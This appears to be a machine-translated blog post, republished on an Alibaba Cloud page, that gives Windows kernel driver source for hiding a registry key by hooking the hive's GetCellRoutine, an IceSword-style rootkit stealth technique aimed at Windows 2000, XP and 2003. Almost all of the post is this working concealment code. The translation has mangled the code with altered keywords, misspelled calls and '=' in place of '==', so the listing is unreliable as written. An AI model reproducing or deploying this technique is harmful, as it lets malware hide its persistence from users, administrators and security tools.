Run the latest icesword1.22 driver code to hide the registry key. In the past, the driver was written in icesword, but it was not disclosed in the end. At that time, rogue software was gaining momentum, so I didn't want to add fuel to the fire. Now the anti-rogue software is becoming increasingly mature, so it doesn't matter. Knowing the Principles makes defense very easy. The principle is very simple, and the implementation code is very short. You can directly look at the sample code. # Include <ntddk. h> # define get_ptr (PTR, offset) (* (pvoid *) (ulong) PTR + (offset # offset) # define cm_key_index_root 0x6972 // IR
# Define cm_key_index_leaf 0x696c // Il
# Define cm_key_fast_leaf 0x666c // fl
# Define cm_key_hash_leaf 0x686c // HL // some cm data structures, only the first part used
# Pragma pack (1)
Typedef struct _ cm_key_node {
Ushort signature;
Ushort flags;
Large_integer lastwritetime;
Ulong spare; // used to be titleindex
Handle parent;
Ulong subkeycounts [2]; // stable and volatile
Handle subkeylists [2]; // stable and volatile
//...
} Cm_key_node, * pcm_key_node; typedef struct _ cm_key_index {
Ushort signature;
Ushort count;
Handle list [1];
} Cm_key_index, * pcm_key_index; typedef struct _ cm_key_body {
Ulong type; // "ky02"
Pvoid keycontrolblock;
Pvoid policyblock;
Peprocess process; // The owner Process
List_entry keybodylist; // key_nodes using the same KCB
} Cm_key_body, * pcm_key_body; typedef pvoid (_ stdcall * pget_cell_routine) (pvoid, handle); typestrudef CT _ hhive {
Ulong signature;
Pget_cell_routine getcellroutine;
//...
} Hhive, * phhive;
# Pragma pack () // name of the primary key to be hidden
Wchar g_hidekeyname [] = l "// registry // machine // system // CurrentControlSet // services // beep"; pget_cell_routine g_pgetcellroutine = NULL;
Pget_cell_routine * g_ppgetcellroutine = NULL; pcm_key_node g_hidenode = NULL;
Pcm_key_node g_lastnode = NULL; // open the key with the specified name
Handle openkeybyname (pcwstr pwcskeyname)
{
Ntstatus status;
Unicode_string ukeyname;
Object_attributes OA;
Handle hkey; rtlinitunicodestring (& ukeyname, pwcskeyname );
Initializeobjectattributes (& OA, & ukeyname, obj_case_insensitive | obj_kernel_handle, null, null );
Status = zwopenkey (& hkey, key_read, & OA );
If (! Nt_success (Status ))
{
Dbuplint ("zwopenkey failed: % LX/N", status );
Return NULL;
} Return hkey;
} // Obtain the keycontrolblock of the specified key handle
Pvoid getkeycontrolblock (handle hkey)
{
Ntstatus status;
Pcm_key_body keybody;
Pvoid KCB; If (hkey = NULL) return NULL; // get the object body by the key handle
Status = obreferenceobjectbyhandle (hkey, key_read, null, kernelmode, & keybody, null );
If (! Nt_success (Status ))
{
Dbuplint ("obreferenceobjectbyhandle failed: % LX/N", status );
Return NULL;
} // The object body contains keycontrolblock
KCB = keybody-> keycontrolblock;
Dbuplint ("keycontrolblock = % LX/N", KCB); obdereferenceobject (keybody); Return KCB;
} // Get the node of the last child key of the parent key
Pvoid getlastkeynode (pvoid hive, pcm_key_node node)
{
// Obtain the node of the parent key
Pcm_key_node parentnode = (pcm_key_node) g_pgetcellroutine (hive, node-> parent );
// Obtain the index of the subkey
Pcm_key_index Index = (pcm_key_index) g_pgetcellroutine (hive, parentnode-> subkeylists [0]); dbuplint ("parentnode = % LX/nindex = % LX/N", parentnode, index ); // if it is a root (secondary) index, obtain the last index
If (index-> Signature = cm_key_index_root)
{
Index = (pcm_key_index) g_pgetcellroutine (hive, index-> list [index-> count-1]);
Dbuplint ("Index = % LX/N", index );
} If (index-> Signature = cm_key_fast_leaf | index-> Signature = cm_key_hash_leaf)
{
// Fast leaf index (2 k) or hash leaf index (XP/2K3), return the last Node
Return g_pgetcellroutine (hive, index-> list [2 * (index-> count-1)]);
}
Else
{
// General leaf index, returns the last Node
Return g_pgetcellroutine (hive, index-> list [index-> count-1]);
}
} // Hook function of the getcell routine
Pvoid mygetcellroutine (pvoid hive, handle cell)
{
// Call the original function
Pvoid pret = g_pgetcellroutine (hive, cell );
If (pret)
{
// The node to be hidden is returned.
If (pret = g_hidenode)
{
Dbuplint ("getcellroutine (% lx, % 08lx) = % LX/N", hive, cell, Pret );
// Query, save, and return the last child key node of its parent key
Pret = g_lastnode = (pcm_key_node) getlastkeynode (hive, g_hidenode );
Dbuplint ("g_lastnode = % LX/N", g_lastnode );
// Hide the last node and return a null value.
If (pret = g_hidenode) Pret = NULL;
}
// The last saved node is returned.
Else if (pret = g_lastnode)
{
Dbuplint ("getcellroutine (% lx, % 08lx) = % LX/N", hive, cell, Pret );
// Clear the saved value and return a null value
Pret = g_lastnode = NULL;
}
}
Return pret;
} Ntstatus driverunload (pdriver_object pdrvobj)
{
Dbuplint ("driverunload ()/n ");
// Release the hook
If (g_ppgetcellroutine) * g_ppgetcellroutine = g_pgetcellroutine;
Return STATUS_SUCCESS;
} Ntstatus DriverEntry (pdriver_object pdrvobj, punicode_string pregpath)
{
Ulong buildnumber;
Ulong keyhiveoffset; // keycontrolblock-> keyhive
Ulong keycelloffset; // keycontrolblock-> keycell
Handle hkey;
Pvoid KCB, hive; dbuplint ("DriverEntry ()/n"); pdrvobj-> driverunload = driverunload; // query buildnumber
If (psgetversion (null, null, & buildnumber, null) return status_not_supported;
Dbuplint ("buildnumber = % d/N", buildnumber); // different versions of the keycontrolblock Structure
// The cell value is generally less than 0x80000000, while hive is the opposite. This can also be determined.
Switch (buildnumber)
{
Case 2195: // win2000
Keyhiveoffset = 0xc;
Keycelloffset = 0x10;
Break;
Case 2600: // WINXP
Case 3790: // win2003
Keyhiveoffset = 0x10;
Keycelloffset = 0x14;
Break;
Default:
Return status_not_supported;
} // Open the key to be hidden
Hkey = openkeybyname (g_hidekeyname );
// Obtain the keycontrolblock of the key
KCB = getkeycontrolblock (hkey );
If (KCB)
{
// Obtain hive from KCB
Phhive hive = (phhive) get_ptr (KCB, keyhive );
// Getcellroutine in KCB, save the original address
G_ppgetcellroutine = & hive-> getcellroutine;
G_pgetcellroutine = hive-> getcellroutine;
Dbuplint ("getcellroutine = % LX/N", g_pgetcellroutine );
// Obtain and save the nodes to be hidden
G_hidenode = (pcm_key_node) g_pgetcellroutine (hive, get_ptr (KCB, keycell ));
// Hook the getcell routine
Hive-> getcellroutine = mygetcellroutine;
}
Zwclose (hkey); return STATUS_SUCCESS;
}
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
